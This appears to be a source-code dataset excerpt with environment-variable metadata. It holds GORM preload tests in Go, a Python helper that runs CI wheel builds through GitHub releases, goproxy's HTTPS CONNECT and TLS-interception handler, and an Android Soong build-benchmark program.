got2.Level1s = []*Level1{&zhLevel1}
if !reflect.DeepEqual(got4, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got4), toJSONString([]Level2{got, got2}))
}
}
func TestNilPointerSlice(t *testing.T) {
type (
Level3 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level3ID uint
Level3 *Level3
}
Level1 struct {
ID uint
Value string
Level2ID uint
Level2 *Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level1{
Value: "Bob",
Level2: &Level2{
Value: "en",
Level3: &Level3{
Value: "native",
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level1{
Value: "Tom",
Level2: nil,
}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got []Level1
if err := DB.Preload("Level2").Preload("Level2.Level3").Find(&got).Error; err != nil {
t.Error(err)
}
if len(got) != 2 {
t.Errorf("got %v items, expected 2", len(got))
}
if !reflect.DeepEqual(got[0], want) && !reflect.DeepEqual(got[1], want) {
t.Errorf("got %s; want array containing %s", toJSONString(got), toJSONString(want))
}
if !reflect.DeepEqual(got[0], want2) && !reflect.DeepEqual(got[1], want2) {
t.Errorf("got %s; want array containing %s", toJSONString(got), toJSONString(want2))
}
}
func TestNilPointerSlice2(t *testing.T) {
type (
Level4 struct {
ID uint
}
Level3 struct {
ID uint
Level4ID sql.NullInt64 `sql:"index"`
Level4 *Level4
}
Level2 struct {
ID uint
Level3s []*Level3 `gorm:"many2many:level2_level3s"`
}
Level1 struct {
ID uint
Level2ID sql.NullInt64 `sql:"index"`
Level2 *Level2
}
)
DB.DropTableIfExists(new(Level4))
DB.DropTableIfExists(new(Level3))
DB.DropTableIfExists(new(Level2))
DB.DropTableIfExists(new(Level1))
if err := DB.AutoMigrate(new(Level4), new(Level3), new(Level2), new(Level1)).Error; err != nil {
t.Error(err)
}
want := new(Level1)
if err := DB.Save(want).Error; err != nil {
t.Error(err)
}
got := new(Level1)
err := DB.Preload("Level2.Level3s.Level4").Last(&got).Error
if err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestPrefixedPreloadDuplication(t *testing.T) {
type (
Level4 struct {
ID uint
Name string
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level4s []*Level4
}
Level2 struct {
ID uint
Name string
Level3ID sql.NullInt64 `sql:"index"`
Level3 *Level3
}
Level1 struct {
ID uint
Name string
Level2ID sql.NullInt64 `sql:"index"`
Level2 *Level2
}
)
DB.DropTableIfExists(new(Level3))
DB.DropTableIfExists(new(Level4))
DB.DropTableIfExists(new(Level2))
DB.DropTableIfExists(new(Level1))
if err := DB.AutoMigrate(new(Level3), new(Level4), new(Level2), new(Level1)).Error; err != nil {
t.Error(err)
}
lvl := &Level3{}
if err := DB.Save(lvl).Error; err != nil {
t.Error(err)
}
sublvl1 := &Level4{Level3ID: lvl.ID}
if err := DB.Save(sublvl1).Error; err != nil {
t.Error(err)
}
sublvl2 := &Level4{Level3ID: lvl.ID}
if err := DB.Save(sublvl2).Error; err != nil {
t.Error(err)
}
lvl.Level4s = []*Level4{sublvl1, sublvl2}
want1 := Level1{
Level2: &Level2{
Level3: lvl,
},
}
if err := DB.Save(&want1).Error; err != nil {
t.Error(err)
}
want2 := Level1{
Level2: &Level2{
Level3: lvl,
},
}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
want := []Level1{want1, want2}
var got []Level1
err := DB.Preload("Level2.Level3.Level4s").Find(&got).Error
if err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestPreloadManyToManyCallbacks(t *testing.T) {
type (
Level2 struct {
ID uint
Name string
}
Level1 struct {
ID uint
Name string
Level2s []Level2 `gorm:"many2many:level1_level2s;AssociationForeignKey:ID;ForeignKey:ID"`
}
)
DB.DropTableIfExists("level1_level2s")
DB.DropTableIfExists(new(Level1))
DB.DropTableIfExists(new(Level2))
if err := DB.AutoMigrate(new(Level1), new(Level2)).Error; err != nil {
t.Error(err)
}
lvl := Level1{
Name: "l1",
Level2s: []Level2{
Level2{Name: "l2-1"}, Level2{Name: "l2-2"},
},
}
DB.Save(&lvl)
called := 0
DB.Callback().Query().After("gorm:query").Register("TestPreloadManyToManyCallbacks", func(scope *gorm.Scope) {
called = called + 1
})
DB.Preload("Level2s").First(&Level1{}, "id = ?", lvl.ID)
if called != 3 {
t.Errorf("Wanted callback to be called 3 times but got %d", called)
}
}
func toJSONString(v interface{}) []byte {
r, _ := json.MarshalIndent(v, "", " ")
return r
}
| [
"\"GORM_DIALECT\""
]
| []
| [
"GORM_DIALECT"
]
| [] | ["GORM_DIALECT"] | go | 1 | 0 | |
mb.py | MAGIC_BUILD_REPO = "njsmith/cymem-wheels"
# We substitute the project name into this string to get the URL to clone:
DEFAULT_CLONE_TEMPLATE = "https://github.com/explosion/{}.git"
# All the statuses we want to wait for
# maps github name -> our display name
STATUSES = {
"continuous-integration/appveyor/branch": "appveyor",
"continuous-integration/travis-ci/push": "travis",
}
FINAL_STATES = {"error", "failure", "success"}
BAD_STATES = {"error", "failure"}
import os
import os.path
import sys
import glob
import json
from textwrap import dedent
import subprocess
from contextlib import contextmanager
import time
import github
import click
import requests
#github.enable_console_debug_logging()
# Hack to make urllib3 SSL support work on older macOS Python builds
# (In particular, as of 2018-08-24, this is necessary to allow multibuild's
# py35 to connect to github without "[SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1
# alert protocol version (_ssl.c:719)" errors.)
if sys.platform == "darwin":
import urllib3.contrib.securetransport
urllib3.contrib.securetransport.inject_into_urllib3()
def get_gh():
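    # Authenticate against GitHub with the GITHUB_SECRET_TOKEN environment variable if set,
    # otherwise with a github-secret-token.txt file next to this script.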
token_path = os.path.join(
os.path.dirname(__file__), "github-secret-token.txt"
)
if "GITHUB_SECRET_TOKEN" in os.environ:
token = os.environ["GITHUB_SECRET_TOKEN"]
elif os.path.exists(token_path):
with open("github-secret-token.txt") as f:
token = f.read().strip()
else:
raise RuntimeError(
"can't find github token (checked in GITHUB_SECRET_TOKEN envvar, "
"and {}".format(token_path)
)
return github.Github(token)
def get_release(repo_id, release_id):
gh = get_gh()
repo = gh.get_repo(repo_id)
# https://pygithub.readthedocs.io/en/latest/github_objects/GitRelease.html
release = repo.get_release(release_id)
if release is None:
raise RuntimeError("release not found:", release_id)
return release
def get_build_spec(build_spec_path):
with open(build_spec_path) as f:
return json.load(f)
################################################################
@click.group()
def cli():
pass
@cli.command()
@click.argument(
"build_spec",
type=click.Path(exists=True, dir_okay=False),
required=True
)
def build_spec_to_shell(build_spec):
bs = get_build_spec(build_spec)
sys.stdout.write(
"BUILD_SPEC_CLONE_URL='{clone-url}'\n"
"BUILD_SPEC_COMMIT='{commit}'\n"
"BUILD_SPEC_PACKAGE_NAME='{package-name}'\n"
.format(**bs)
)
def _do_upload(bs, paths):
upload_config = bs["upload-to"]
assert upload_config["type"] == "github-release"
release = get_release(upload_config["repo-id"], upload_config["release-id"])
# This is a gross hack, to work around the lack of globbing on Windows
# (see https://github.com/pallets/click/issues/1096)
# We accept either individual files, or directories, and for directories,
# we upload all the .whl files directly inside that directory (no
# recursion).
for given_path in paths:
if os.path.isdir(given_path):
subpaths = glob.glob(os.path.join(given_path, "*.whl"))
else:
subpaths = [given_path]
for actual_path in subpaths:
print("Uploading:", actual_path)
asset = release.upload_asset(actual_path)
print(asset)
print(asset.name, asset.id, asset.state, asset.created_at)
@cli.command()
@click.option(
"--build-spec",
type=click.Path(exists=True, dir_okay=False),
required=True
)
@click.argument(
"paths", nargs=-1, type=click.Path(exists=True)
)
def upload(build_spec, paths):
bs = get_build_spec(build_spec)
_do_upload(bs, paths)
@contextmanager
def cd(d):
orig_dir = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(orig_dir)
def run(cmd):
print("Running:", cmd)
subprocess.check_call(cmd)
@cli.command()
@click.option(
"--build-spec",
type=click.Path(exists=True, dir_okay=False),
required=True
)
def appveyor_build(build_spec):
bs = get_build_spec(build_spec)
run(["git", "clone", bs["clone-url"], "checkout"])
run(["pip", "install", "-Ur", "checkout\\requirements.txt"])
with cd("checkout"):
run(["git", "checkout", bs["commit"]])
run(["python", "setup.py", "bdist_wheel"])
wheels = glob.glob("checkout\\dist\\*.whl")
run(["pip", "install"] + wheels)
os.mkdir("tmp_for_test")
with cd("tmp_for_test"):
run(["pytest", "--pyargs", bs["package-name"]])
_do_upload(bs, wheels)
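# Download every asset attached to the given GitHub release into a local directory named after the release.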
def _download_release_assets(repo_id, release_id):
print("Downloading to {}/...".format(release_id))
try:
os.mkdir(release_id)
except OSError:
pass
with requests.Session() as s:
release = get_release(repo_id, release_id)
for asset in release.get_assets():
print(" " + asset.name)
save_name = os.path.join(release_id, asset.name)
r = s.get(asset.browser_download_url)
with open(save_name, "wb") as f:
f.write(r.content)
print("...all done! See {}/ for your wheels.".format(release_id))
@cli.command(name="magic-build")
@click.option("--magic-build-repo-id", default=MAGIC_BUILD_REPO)
@click.option("--clone-url")
@click.argument("package-name", required=True)
@click.argument("commit", required=True)
def magic_build(magic_build_repo_id, clone_url, package_name, commit):
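    # Create a uniquely named GitHub release and a build branch carrying build-spec.json,
    # then poll the CI statuses and download the resulting wheels on success.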
if clone_url is None:
clone_url = DEFAULT_CLONE_TEMPLATE.format(package_name)
repo = get_gh().get_repo(magic_build_repo_id)
print("Finding a unique name for this release...")
# Pick the release_name by finding an unused one
i = 1
while True:
release_name = "{}-{}-wheels".format(package_name, commit)
if i > 1:
release_name += "-{}".format(i)
try:
repo.get_release(release_name)
except github.UnknownObjectException:
break
i += 1
branch_name = "branch-for-" + release_name
bs = {
"clone-url": clone_url,
"package-name": package_name,
"commit": commit,
"upload-to": {
"type": "github-release",
"repo-id": MAGIC_BUILD_REPO,
"release-id": release_name,
},
}
bs_json = json.dumps(bs)
print("Creating release {!r} to collect assets...".format(release_name))
release = repo.create_git_release(
release_name,
release_name,
"Build spec:\n\n```json\n{}\n```".format(bs_json),
)
print(" {}".format(release.html_url))
print("Creating build branch...".format(MAGIC_BUILD_REPO))
# 'master' is a 'Commit'. 'master.commit' is a 'GitCommit'. These are
# different types that are mostly *not* interchangeable:
# https://pygithub.readthedocs.io/en/latest/github_objects/Commit.html
# https://pygithub.readthedocs.io/en/latest/github_objects/GitCommit.html
master = repo.get_commit("master")
master_gitcommit = master.commit
patch = github.InputGitTreeElement(
"build-spec.json", "100644", "blob", content=bs_json,
)
tree = repo.create_git_tree([patch], master_gitcommit.tree)
our_gitcommit = repo.create_git_commit(
"Building: {}".format(release_name), tree, [master_gitcommit]
)
repo.create_git_ref("refs/heads/" + branch_name, our_gitcommit.sha)
print(" Commit is {} in branch {!r}."
.format(our_gitcommit.sha[:8], branch_name))
print("Waiting for build to complete...")
# get_combined_status needs a Commit, not a GitCommit
our_commit = repo.get_commit(our_gitcommit.sha)
showed_urls = {}
while True:
time.sleep(10)
combined_status = our_commit.get_combined_status()
display_name_to_state = {}
for display_name in STATUSES.values():
display_name_to_state[display_name] = "not available"
for status in combined_status.statuses:
if status.context in STATUSES:
display_name = STATUSES[status.context]
display_name_to_state[display_name] = status.state
if display_name not in showed_urls:
print(" {} logs: {}".format(
display_name, status.target_url
))
showed_urls[display_name] = status.target_url
displays = [
"[{} - {}]".format(display_name, state)
for (display_name, state) in display_name_to_state.items()
]
print(" ".join(displays))
pending = False
failed = False
# The Github states are: "error", "failure", "success", "pending"
for state in display_name_to_state.values():
if state not in FINAL_STATES:
pending = True
if state in BAD_STATES:
failed = True
if failed or not pending:
break
if failed:
print("*** Failed! ***")
for display_name, url in showed_urls.items():
print(" {} logs: {}".format(display_name, url))
sys.exit(1)
else:
_download_release_assets(magic_build_repo_id, release_name)
@cli.command(name="download-release-assets")
@click.option("--repo-id", default=MAGIC_BUILD_REPO)
@click.argument("release-id", required=True)
def download_release_assets(repo_id, release_id):
_download_release_assets(repo_id, release_id)
if __name__ == "__main__":
cli()
| []
| []
| [
"GITHUB_SECRET_TOKEN"
]
| [] | ["GITHUB_SECRET_TOKEN"] | python | 1 | 0 | |
https.go | package goproxy
import (
"bufio"
"crypto/tls"
"errors"
"io"
"io/ioutil"
"net"
"net/http"
"net/url"
"os"
"regexp"
"strings"
"sync"
"sync/atomic"
)
type ConnectActionLiteral int
const (
ConnectAccept = iota
ConnectReject
ConnectMitm
ConnectHijack
ConnectHTTPMitm
ConnectProxyAuthHijack
)
var (
OkConnect = &ConnectAction{Action: ConnectAccept, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
MitmConnect = &ConnectAction{Action: ConnectMitm, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
HTTPMitmConnect = &ConnectAction{Action: ConnectHTTPMitm, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
RejectConnect = &ConnectAction{Action: ConnectReject, TLSConfig: TLSConfigFromCA(&GoproxyCa)}
httpsRegexp = regexp.MustCompile(`^https:\/\/`)
)
// ConnectAction enables the caller to override the standard connect flow.
// When Action is ConnectHijack, it is up to the implementer to send the
// HTTP 200, or any other valid http response back to the client from within the
// Hijack func
type ConnectAction struct {
Action ConnectActionLiteral
Hijack func(req *http.Request, client net.Conn, ctx *ProxyCtx)
TLSConfig func(host string, ctx *ProxyCtx) (*tls.Config, error)
}
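// exampleHijackConnect is an illustrative sketch (not used by this package):
// with ConnectHijack the Hijack callback owns the client connection, so it is
// responsible for writing the "200 Connection established" line itself before
// speaking to the client directly.
var exampleHijackConnect = &ConnectAction{
	Action: ConnectHijack,
	Hijack: func(req *http.Request, client net.Conn, ctx *ProxyCtx) {
		client.Write([]byte("HTTP/1.0 200 Connection established\r\n\r\n"))
		ctx.Logf("hijacked CONNECT to %s", req.Host)
		client.Close()
	},
}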
func stripPort(s string) string {
ix := strings.IndexRune(s, ':')
if ix == -1 {
return s
}
return s[:ix]
}
func (proxy *ProxyHttpServer) dial(network, addr string) (c net.Conn, err error) {
if proxy.Tr.Dial != nil {
return proxy.Tr.Dial(network, addr)
}
return net.Dial(network, addr)
}
func (proxy *ProxyHttpServer) connectDial(network, addr string) (c net.Conn, err error) {
if proxy.ConnectDial == nil {
return proxy.dial(network, addr)
}
return proxy.ConnectDial(network, addr)
}
type halfClosable interface {
net.Conn
CloseWrite() error
CloseRead() error
}
var _ halfClosable = (*net.TCPConn)(nil)
func (proxy *ProxyHttpServer) handleHttps(w http.ResponseWriter, r *http.Request) {
ctx := &ProxyCtx{Req: r, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, certStore: proxy.CertStore}
hij, ok := w.(http.Hijacker)
if !ok {
panic("httpserver does not support hijacking")
}
proxyClient, _, e := hij.Hijack()
if e != nil {
panic("Cannot hijack connection " + e.Error())
}
ctx.Logf("Running %d CONNECT handlers", len(proxy.httpsHandlers))
todo, host := OkConnect, r.URL.Host
for i, h := range proxy.httpsHandlers {
newtodo, newhost := h.HandleConnect(host, ctx)
// If found a result, break the loop immediately
if newtodo != nil {
todo, host = newtodo, newhost
ctx.Logf("on %dth handler: %v %s", i, todo, host)
break
}
}
switch todo.Action {
case ConnectAccept:
if !hasPort.MatchString(host) {
host += ":80"
}
targetSiteCon, err := proxy.connectDial("tcp", host)
if err != nil {
httpError(proxyClient, ctx, err)
return
}
ctx.Logf("Accepting CONNECT to %s", host)
proxyClient.Write([]byte("HTTP/1.0 200 Connection established\r\n\r\n"))
targetTCP, targetOK := targetSiteCon.(halfClosable)
proxyClientTCP, clientOK := proxyClient.(halfClosable)
if targetOK && clientOK {
// todo: make sure everything is fine
go func() {
var wg sync.WaitGroup
wg.Add(2)
go copyAndClose(ctx, targetTCP, proxyClientTCP, &wg)
go copyAndClose(ctx, proxyClientTCP, targetTCP, &wg)
wg.Wait()
proxyClientTCP.Close()
targetTCP.Close()
}()
} else {
go func() {
var wg sync.WaitGroup
wg.Add(2)
go copyOrWarn(ctx, targetSiteCon, proxyClient, &wg)
go copyOrWarn(ctx, proxyClient, targetSiteCon, &wg)
wg.Wait()
proxyClient.Close()
targetSiteCon.Close()
}()
}
case ConnectHijack:
ctx.Logf("Hijacking CONNECT to %s", host)
todo.Hijack(r, proxyClient, ctx)
case ConnectHTTPMitm:
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
ctx.Logf("Assuming CONNECT is plain HTTP tunneling, mitm proxying it")
targetSiteCon, err := proxy.connectDial("tcp", host)
if err != nil {
ctx.Warnf("Error dialing to %s: %s", host, err.Error())
return
}
for {
client := bufio.NewReader(proxyClient)
remote := bufio.NewReader(targetSiteCon)
req, err := http.ReadRequest(client)
if err != nil && err != io.EOF {
ctx.Warnf("cannot read request of MITM HTTP client: %+#v", err)
}
if err != nil {
return
}
req, resp := proxy.filterRequest(req, ctx)
if resp == nil {
if err := req.Write(targetSiteCon); err != nil {
httpError(proxyClient, ctx, err)
return
}
resp, err = http.ReadResponse(remote, req)
if err != nil {
httpError(proxyClient, ctx, err)
return
}
defer resp.Body.Close()
}
resp = proxy.filterResponse(resp, ctx)
if err := resp.Write(proxyClient); err != nil {
httpError(proxyClient, ctx, err)
return
}
}
case ConnectMitm:
proxyClient.Write([]byte("HTTP/1.0 200 OK\r\n\r\n"))
ctx.Logf("Assuming CONNECT is TLS, mitm proxying it")
// this goes in a separate goroutine, so that the net/http server won't think we're
// still handling the request even after hijacking the connection. Those HTTP CONNECT
// request can take forever, and the server will be stuck when "closed".
// TODO: Allow Server.Close() mechanism to shut down this connection as nicely as possible
tlsConfig := defaultTLSConfig
if todo.TLSConfig != nil {
var err error
tlsConfig, err = todo.TLSConfig(host, ctx)
if err != nil {
httpError(proxyClient, ctx, err)
return
}
}
go func() {
//TODO: cache connections to the remote website
rawClientTls := tls.Server(proxyClient, tlsConfig)
if err := rawClientTls.Handshake(); err != nil {
ctx.Warnf("Cannot handshake client %v %v", r.Host, err)
return
}
defer rawClientTls.Close()
clientTlsReader := bufio.NewReader(rawClientTls)
for !isEof(clientTlsReader) {
req, err := http.ReadRequest(clientTlsReader)
var ctx = &ProxyCtx{Req: req, Session: atomic.AddInt64(&proxy.sess, 1), proxy: proxy, UserData: ctx.UserData}
if err != nil && err != io.EOF {
return
}
if err != nil {
ctx.Warnf("Cannot read TLS request from mitm'd client %v %v", r.Host, err)
return
}
req.RemoteAddr = r.RemoteAddr // since we're converting the request, need to carry over the original connecting IP as well
ctx.Logf("req %v", r.Host)
if !httpsRegexp.MatchString(req.URL.String()) {
req.URL, err = url.Parse("https://" + r.Host + req.URL.String())
}
				// Bug fix: goproxy fails to set the request URL in the context when
				// MITM'ing HTTPS, so record the parsed request here.
ctx.Req = req
req, resp := proxy.filterRequest(req, ctx)
if resp == nil {
if isWebSocketRequest(req) {
ctx.Logf("Request looks like websocket upgrade.")
proxy.serveWebsocketTLS(ctx, w, req, tlsConfig, rawClientTls)
return
}
if err != nil {
ctx.Warnf("Illegal URL %s", "https://"+r.Host+req.URL.Path)
return
}
removeProxyHeaders(ctx, req)
resp, err = ctx.RoundTrip(req)
if err != nil {
ctx.Warnf("Cannot read TLS response from mitm'd server %v", err)
return
}
ctx.Logf("resp %v", resp.Status)
}
resp = proxy.filterResponse(resp, ctx)
// the underlying Transport will close the client request body.
// https://github.com/golang/go/blob/ab5d9f5831cd267e0d8e8954cfe9987b737aec9c/src/net/http/request.go#L179-L182
// defer resp.Body.Close()
if err := resp.Write(rawClientTls); err != nil {
ctx.Warnf("Cannot write TLS response from mitm'd client: %v", err)
return
}
}
ctx.Logf("Exiting on EOF")
}()
case ConnectProxyAuthHijack:
proxyClient.Write([]byte("HTTP/1.1 407 Proxy Authentication Required\r\n"))
todo.Hijack(r, proxyClient, ctx)
case ConnectReject:
if ctx.Resp != nil {
if err := ctx.Resp.Write(proxyClient); err != nil {
ctx.Warnf("Cannot write response that reject http CONNECT: %v", err)
}
}
proxyClient.Close()
}
}
func httpError(w io.WriteCloser, ctx *ProxyCtx, err error) {
if _, err := io.WriteString(w, "HTTP/1.1 502 Bad Gateway\r\n\r\n"); err != nil {
ctx.Warnf("Error responding to client: %s", err)
}
if err := w.Close(); err != nil {
ctx.Warnf("Error closing client connection: %s", err)
}
}
func copyOrWarn(ctx *ProxyCtx, dst io.Writer, src io.Reader, wg *sync.WaitGroup) {
if _, err := io.Copy(dst, src); err != nil {
ctx.Warnf("Error copying to client: %s", err)
}
wg.Done()
}
func copyAndClose(ctx *ProxyCtx, dst, src halfClosable, wg *sync.WaitGroup) {
if _, err := io.Copy(dst, src); err != nil {
ctx.Warnf("Error copying to client: %s", err)
}
dst.CloseWrite()
src.CloseRead()
wg.Done()
}
func dialerFromEnv(proxy *ProxyHttpServer) func(network, addr string) (net.Conn, error) {
https_proxy := os.Getenv("HTTPS_PROXY")
if https_proxy == "" {
https_proxy = os.Getenv("https_proxy")
}
if https_proxy == "" {
return nil
}
return proxy.NewConnectDialToProxy(https_proxy)
}
func (proxy *ProxyHttpServer) NewConnectDialToProxy(https_proxy string) func(network, addr string) (net.Conn, error) {
return proxy.NewConnectDialToProxyWithHandler(https_proxy, nil)
}
func (proxy *ProxyHttpServer) NewConnectDialToProxyWithHandler(https_proxy string, connectReqHandler func(req *http.Request)) func(network, addr string) (net.Conn, error) {
u, err := url.Parse(https_proxy)
if err != nil {
return nil
}
if u.Scheme == "" || u.Scheme == "http" {
if strings.IndexRune(u.Host, ':') == -1 {
u.Host += ":80"
}
return func(network, addr string) (net.Conn, error) {
connectReq := &http.Request{
Method: "CONNECT",
URL: &url.URL{Opaque: addr},
Host: addr,
Header: make(http.Header),
}
if connectReqHandler != nil {
connectReqHandler(connectReq)
}
c, err := proxy.dial(network, u.Host)
if err != nil {
return nil, err
}
connectReq.Write(c)
// Read response.
// Okay to use and discard buffered reader here, because
// TLS server will not speak until spoken to.
br := bufio.NewReader(c)
resp, err := http.ReadResponse(br, connectReq)
if err != nil {
c.Close()
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != 200 {
resp, err := ioutil.ReadAll(resp.Body)
if err != nil {
return nil, err
}
c.Close()
return nil, errors.New("proxy refused connection" + string(resp))
}
return c, nil
}
}
if u.Scheme == "https" || u.Scheme == "wss" {
if strings.IndexRune(u.Host, ':') == -1 {
u.Host += ":443"
}
return func(network, addr string) (net.Conn, error) {
c, err := proxy.dial(network, u.Host)
if err != nil {
return nil, err
}
c = tls.Client(c, proxy.Tr.TLSClientConfig)
connectReq := &http.Request{
Method: "CONNECT",
URL: &url.URL{Opaque: addr},
Host: addr,
Header: make(http.Header),
}
if connectReqHandler != nil {
connectReqHandler(connectReq)
}
connectReq.Write(c)
// Read response.
// Okay to use and discard buffered reader here, because
// TLS server will not speak until spoken to.
br := bufio.NewReader(c)
resp, err := http.ReadResponse(br, connectReq)
if err != nil {
c.Close()
return nil, err
}
defer resp.Body.Close()
if resp.StatusCode != 200 {
body, err := ioutil.ReadAll(io.LimitReader(resp.Body, 500))
if err != nil {
return nil, err
}
c.Close()
return nil, errors.New("proxy refused connection" + string(body))
}
return c, nil
}
}
return nil
}
func TLSConfigFromCA(ca *tls.Certificate) func(host string, ctx *ProxyCtx) (*tls.Config, error) {
return func(host string, ctx *ProxyCtx) (*tls.Config, error) {
var err error
var cert *tls.Certificate
hostname := stripPort(host)
config := *defaultTLSConfig
ctx.Logf("signing for %s", stripPort(host))
genCert := func() (*tls.Certificate, error) {
return signHost(*ca, []string{hostname})
}
if ctx.certStore != nil {
cert, err = ctx.certStore.Fetch(hostname, genCert)
} else {
cert, err = genCert()
}
if err != nil {
ctx.Warnf("Cannot sign host certificate with provided CA: %s", err)
return nil, err
}
config.Certificates = append(config.Certificates, *cert)
return &config, nil
}
}
| [
"\"HTTPS_PROXY\"",
"\"https_proxy\""
]
| []
| [
"HTTPS_PROXY",
"https_proxy"
]
| [] | ["HTTPS_PROXY", "https_proxy"] | go | 2 | 0 | |
cuj/cuj.go | // Copyright 2019 Google Inc. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// This executable runs a series of build commands to test and benchmark some critical user journeys.
package main
import (
"context"
"fmt"
"os"
"path/filepath"
"strconv"
"strings"
"time"
"android/soong/ui/build"
"android/soong/ui/logger"
"android/soong/ui/metrics"
"android/soong/ui/status"
"android/soong/ui/terminal"
"android/soong/ui/tracer"
)
type Test struct {
name string
args []string
before func() error
results TestResults
}
type TestResults struct {
metrics *metrics.Metrics
err error
}
// Run runs a single build command. It emulates the "m" command line by calling into Soong UI directly.
func (t *Test) Run(logsDir string) {
output := terminal.NewStatusOutput(os.Stdout, "", false, false)
log := logger.New(output)
defer log.Cleanup()
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
trace := tracer.New(log)
defer trace.Close()
met := metrics.New()
stat := &status.Status{}
defer stat.Finish()
stat.AddOutput(output)
stat.AddOutput(trace.StatusTracer())
build.SetupSignals(log, cancel, func() {
trace.Close()
log.Cleanup()
stat.Finish()
})
buildCtx := build.Context{ContextImpl: &build.ContextImpl{
Context: ctx,
Logger: log,
Metrics: met,
Tracer: trace,
Writer: output,
Status: stat,
}}
defer logger.Recover(func(err error) {
t.results.err = err
})
config := build.NewConfig(buildCtx, t.args...)
build.SetupOutDir(buildCtx, config)
os.MkdirAll(logsDir, 0777)
log.SetOutput(filepath.Join(logsDir, "soong.log"))
trace.SetOutput(filepath.Join(logsDir, "build.trace"))
stat.AddOutput(status.NewVerboseLog(log, filepath.Join(logsDir, "verbose.log")))
stat.AddOutput(status.NewErrorLog(log, filepath.Join(logsDir, "error.log")))
stat.AddOutput(status.NewProtoErrorLog(log, filepath.Join(logsDir, "build_error")))
stat.AddOutput(status.NewCriticalPath(log))
defer met.Dump(filepath.Join(logsDir, "soong_metrics"))
if start, ok := os.LookupEnv("TRACE_BEGIN_SOONG"); ok {
if !strings.HasSuffix(start, "N") {
if start_time, err := strconv.ParseUint(start, 10, 64); err == nil {
log.Verbosef("Took %dms to start up.",
time.Since(time.Unix(0, int64(start_time))).Nanoseconds()/time.Millisecond.Nanoseconds())
buildCtx.CompleteTrace(metrics.RunSetupTool, "startup", start_time, uint64(time.Now().UnixNano()))
}
}
if executable, err := os.Executable(); err == nil {
trace.ImportMicrofactoryLog(filepath.Join(filepath.Dir(executable), "."+filepath.Base(executable)+".trace"))
}
}
f := build.NewSourceFinder(buildCtx, config)
defer f.Shutdown()
build.FindSources(buildCtx, config, f)
build.Build(buildCtx, config, build.BuildAll)
t.results.metrics = met
}
// Touch the Intent.java file to cause a rebuild of the frameworks to monitor the
// incremental build speed, as mentioned in b/152046247. The Intent.java file was
// chosen as it is a key component of the framework and is often modified.
func touchIntentFile() error {
const intentFileName = "frameworks/base/core/java/android/content/Intent.java"
currentTime := time.Now().Local()
return os.Chtimes(intentFileName, currentTime, currentTime)
}
func main() {
outDir := os.Getenv("OUT_DIR")
if outDir == "" {
outDir = "out"
}
cujDir := filepath.Join(outDir, "cuj_tests")
// Use a subdirectory for the out directory for the tests to keep them isolated.
os.Setenv("OUT_DIR", filepath.Join(cujDir, "out"))
// Each of these tests is run in sequence without resetting the output tree. The state of the output tree will
// affect each successive test. To maintain the validity of the benchmarks across changes, care must be taken
// to avoid changing the state of the tree when a test is run. This is most easily accomplished by adding tests
// at the end.
tests := []Test{
{
// Reset the out directory to get reproducible results.
name: "clean",
args: []string{"clean"},
},
{
// Parse the build files.
name: "nothing",
args: []string{"nothing"},
},
{
// Parse the build files again to monitor issues like globs rerunning.
name: "nothing_rebuild",
args: []string{"nothing"},
},
{
// Parse the build files again, this should always be very short.
name: "nothing_rebuild_twice",
args: []string{"nothing"},
},
{
// Build the framework as a common developer task and one that keeps getting longer.
name: "framework",
args: []string{"framework"},
},
{
// Build the framework again to make sure it doesn't rebuild anything.
name: "framework_rebuild",
args: []string{"framework"},
},
{
// Build the framework again to make sure it doesn't rebuild anything even if it did the second time.
name: "framework_rebuild_twice",
args: []string{"framework"},
},
{
// Scenario major_inc_build (b/152046247): tracking build speed of major incremental build.
name: "major_inc_build_droid",
args: []string{"droid"},
},
{
name: "major_inc_build_framework_minus_apex_after_droid_build",
args: []string{"framework-minus-apex"},
before: touchIntentFile,
},
{
name: "major_inc_build_framework_after_droid_build",
args: []string{"framework"},
before: touchIntentFile,
},
{
name: "major_inc_build_sync_after_droid_build",
args: []string{"sync"},
before: touchIntentFile,
},
{
name: "major_inc_build_droid_rebuild",
args: []string{"droid"},
before: touchIntentFile,
},
{
name: "major_inc_build_update_api_after_droid_rebuild",
args: []string{"update-api"},
before: touchIntentFile,
},
}
cujMetrics := metrics.NewCriticalUserJourneysMetrics()
defer cujMetrics.Dump(filepath.Join(cujDir, "logs", "cuj_metrics.pb"))
for i, t := range tests {
logsSubDir := fmt.Sprintf("%02d_%s", i, t.name)
logsDir := filepath.Join(cujDir, "logs", logsSubDir)
if t.before != nil {
if err := t.before(); err != nil {
fmt.Printf("error running before function on test %q: %v\n", t.name, err)
break
}
}
t.Run(logsDir)
if t.results.err != nil {
fmt.Printf("error running test %q: %s\n", t.name, t.results.err)
break
}
if t.results.metrics != nil {
cujMetrics.Add(t.name, t.results.metrics)
}
}
}
| [
"\"OUT_DIR\""
